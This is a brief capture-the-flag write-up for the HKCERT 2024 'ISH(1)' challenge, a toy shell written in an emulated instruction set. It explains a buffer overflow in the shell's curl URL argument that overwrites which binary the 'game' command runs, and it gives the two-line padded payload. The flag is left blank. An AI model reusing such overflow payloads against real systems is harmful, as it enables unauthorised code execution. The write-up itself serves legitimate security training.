# Binary Exploitation

<table><thead><tr><th width="347">Challenge</th><th>Link</th></tr></thead><tbody><tr><td>ISH(1) (200 pts)</td><td><a href="#ish-1-200-pts">Here</a></td></tr></tbody></table>

## ISH(1) (200 pts)

### Description

Shell(a.k.a sh) is a text-based interface where users can type commands to interact with the operating system. I'm trying to implement a shell using ISA, I call it ISH.

Note: This challenge is the first part of the ISH fullchain, execute flag1 file in ish to get the flag.

Note: ISH (1), ISH (2) and ISH (3) share the same environment, and it is recommended to solve the ISH fullchain challenges in order.

Note: Here is the [full documentation](https://hackmd.io/@blackb6a/bauhinia-isa) and [ISA interpreter source code](https://github.com/blackb6a/ISA-Engine) if you need more references.

* Challenge: [https://c58a-ish-1.hkcert24.pwnable.hk?id=2](https://c58a-ish-1.hkcert24.pwnable.hk/?id=2)
* Playground: [https://c58b-ish-2.hkcert24.pwnable.hk?id=1](https://c58b-ish-2.hkcert24.pwnable.hk/?id=1)

### Solution

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FVUS55DGcUdipZCDdChFx%2Fimage.png?alt=media&#x26;token=032d9002-cc71-4c6b-90a0-6d46a0df3814" alt=""><figcaption></figcaption></figure>

There is a buffer overflow on URL in curl command. With the overflow we can overwrite the filename for the binary that will be executed by command game. So the idea is to find how to make the curl still valid with the overflow and then overwrite the filename with flag1. Below is my payload

```bash
curl g.co#aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaflag1
game
```

Flag:&#x20;